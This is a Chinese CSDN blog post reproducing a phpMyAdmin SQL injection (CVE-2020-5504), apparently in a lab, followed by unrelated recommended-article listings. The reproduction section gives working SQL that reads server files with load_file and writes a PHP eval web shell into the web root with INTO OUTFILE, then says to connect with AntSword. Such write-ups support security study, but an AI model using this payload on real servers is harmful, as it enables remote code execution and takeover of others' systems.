phpmyadmin SQL注入(CVE-2020-5504)

已于 2024-07-23 10:28:40 修改
阅读量146 收藏
点赞数 4
分类专栏: # SQL注入 文章标签: oracle 数据库
于 2024-07-23 09:34:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140625999
版权

一、漏洞概述

phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。
在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。
路径:/pma/index.php 账号密码root:123456

二、影响范围

三、访问页面

四、漏洞复现

1、登录,账号密码root:123456

2、漏洞验证,查询数据库的路径

select @@datadir

3、判断网站路径,如果返回不为空,说明路径正确。

SELECT load_file('/var/www/html/pma/index.php')

4、写入shell

select '<?php echo \'<pre>\';@eval($_POST[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE '/var/www/html/pma/1.php'

5、使用蚁剑等工具连接

风中追风-fzzf
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin SQL注入CVE-2020-5504
千寻的博客
03-07 1414
phpMyAdminphpMyAdmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
CVE-2020-11890:CVE-2020-11890
03-10
CVE-2020-11890:用户组表类中的输入验证不正确可能会导致RCE的ACL配置损坏 关联 PoC 受影响的版本:3.9.17之前的Joomla核心 用户要求:管理员帐户(非超级管理员) 获得访问权限:创建一个新的超级管理员,然后触发...
phpmyadmin SQL注入CVE-2020-5504) 复现
YouthBelief的博客
11-11 3798
phpmyadmin SQL注入CVE-2020-5504phpmyadmin SQL注入CVE-2020-5504)0x01 漏洞描述0x02 影响范围0x03 漏洞复现漏洞利用0x04 漏洞修复 phpmyadmin SQL注入CVE-2020-5504) 0x01 漏洞描述 phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞
phpmyadmin SQL注入CVE-2020-5504)复现
weixin_63124284的博客
10-26 2391
在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。
[Vulfocus解题系列] phpmyadmin SQL注入CVE-2020-5504
00勇士王子的博客
10-01 3795
漏洞介绍 名称: phpmyadmin SQL注入CVE-2020-5504) 描述: phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 解题过程 1.访问题目环境,因为这个漏洞是phpmyadmin的后台漏洞,
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-02
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
集合的流式API与数据库查询:深入比较与实践
哎 你看的博客
07-19 669
Java 8 引入的流式API(Stream API)为集合操作带来了声明式编程的新范式,提供了一种高效、易读的方式来处理集合数据。与此同时,数据库查询作为数据处理的核心手段,也在软件开发中扮演着重要角色。本文将深入探讨Java集合的流式API与数据库查询之间的异同,并提供详细的代码示例。
EasyExcel导入导出数据类型转换
qq_41481924的博客
07-18 291
1、基本数据类型转换:当前原始的数据类型是interger类型,需要在导出时将其映射为对应的字符串,并且导入时可以将字符串重新映射为interger类型。2、时间格式转换:数据从数据库中获取的类型为LocalDate类型,即yyyy-mm-dd,导出时需要将其格式化为yyyy-mm类型,导入时可以将yyyy-mm串重新映射为yyyy-mm-dd。
Oracle 数据库 21c 的创新特性
qq_22201881的博客
07-18 637
Oracle 数据库 21c 不仅包含 200 多项全新创新,包括不可变区块链表、数据库内 JavaScript、原生 JSON 二进制数据类型、数据库内机器学习的 AutoML、持久性内存存储,同时增强了内存、图形处理性能、数据库分片、多租户和安全性功能等。为了简化分片设计和使用,Oracle 数据库 21c 提供了分片顾问工具(Sharding Advisor Tool),可评估数据库 schema 及其负载特征,针对性能、可扩展性和可用性进行优化的分片数据库设计,同时支持跨分片的自动备份和恢复功能。
MySQL简介以及对数据库的操作
m0_68041576的博客
07-18 1229
长期存放在计算机内,有组织、可共享的大量数据的集合,是一个 数据“仓库”。
数据库基础与性能概述及相关术语
最新发布
jun778895的博客
07-22 496
数据库是计算机科学中的一个关键分支,它涵盖了数据的存储、管理、检索和安全性等多个方面。数据库性能是指数据库系统处理数据操作(如查询、更新、删除等)的速度和效率,以及系统在高负载下的稳定性和可靠性。提升数据库性能是数据库管理和优化的核心目标之一。
DM数据库导出excel表结构
billzhen的博客
07-19 390
and utc.Table_Name = ‘xxx’ and owner=‘模式名字’utc.data_precision 数据精度,utc.data_length 数据长度,utc.column_name 字段名,utc.data_type 字段类型,utc.nullable 是否为空 ,ucc.comments 备注。
mysql、oracle、db2数据库连接参数
卿本佳人的博客
07-18 360
mysql、oracle、db2数据库连接参数 参数/数据库 driver url Mysql com.mysql.jdbc.Driver 或 com.mysql.cj.jdbc.Driver jdbc:mysql://localhost:3306/数据库Oracle oracle.jdbc.driver.OracleDriver jdbc:oracle:thin:@localhost:1521:orcl //orcl为数据库SID DB2 com.ibm.db2.jcc.D
oracle备份和恢复exp/imp-----从全库备份中恢复用户库解题思路
睡不醒的每天
07-17 318
其中fromuser=gk为.dmp文件里的对象的原先的owner,full方式可以备份所有用户的数据库对象,包括表空间、用户信息等,第一步:使用系统管理员账号将oracle整个导出备份----touser=gk123为作为导入的对象的新的Owner。owner=XX只能备份指定用户的对象。第二步:删除全库中的用户库(
二级医院LIS系统源码,医学检验系统,支持DB2,Oracle,MS SQLServer等主流数据库
m0_67098612的博客
07-22 610
LIS系统即实验室信息管理系统。LIS系统能实现临床检验信息化,检验科信息管理自动化。其主要功能是将检验科的实验仪器传出的检验数据经数据分析后,自动生成打印报告,通过网络存储在数据库中,使医生能够通过医生工作站方便、及时地看到患者的检验结果。医院LIS系统通过计算机网络使所有检验仪器相连接,数据集中存储,集中处理,使检验有关各部门分散的业务联成一个共同整体,并将检验工作的整个流程置于计算机的实时监控之下,加强检验科室的内部管理。本套实验室管理信息系统采用.Net C#语言开发,用C/S架构。
MyBatis中的优点和缺点?
weixin_60246228的博客
07-18 250
1.基于 SQL语句编程,相当灵活,不会对应用程序或者数据库的现有设计造成任何影响,SQL单独写,解除 sq!2.与JDBC 相比,减少了 50%以上的代码量,消除了 JDBC 大量冗余代码,不需要手动开关连接。5.提供映射标签,提供对象关系映射标签,支持对象关系组件维护支持对象与数据库的 ORM 字段关系映射。1.SQL 语句的编写工作量较大,尤其当字段多、关联表多时,对开人员编写SQL语句的功底有一定要求。2.SQL 语句依赖于数据库, 导致数据库移植性差,不能随意更换数据库
CVE-2016-5734
09-04
CVE-2016-5734是一个针对PHPMyAdmin的漏洞,该漏洞允许远程攻击者执行任意命令。该漏洞可以通过使用提供的Python脚本来利用,脚本可以在指定的URL上执行特定命令。如果你想进一步了解该漏洞以及如何分析它,可以参考提供的链接。如果你想在本地环境中测试该漏洞,可以下载并安装vulhub,并进入/vulhub/phpmyadmin/CVE-2016-5734目录,然后使用提供的命令启动环境。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [buuctf [PHPMYADMIN]CVE-2016-5734](https://blog.csdn.net/qq_36241198/article/details/115017777)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现](https://blog.csdn.net/weixin_41924764/article/details/113063083)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值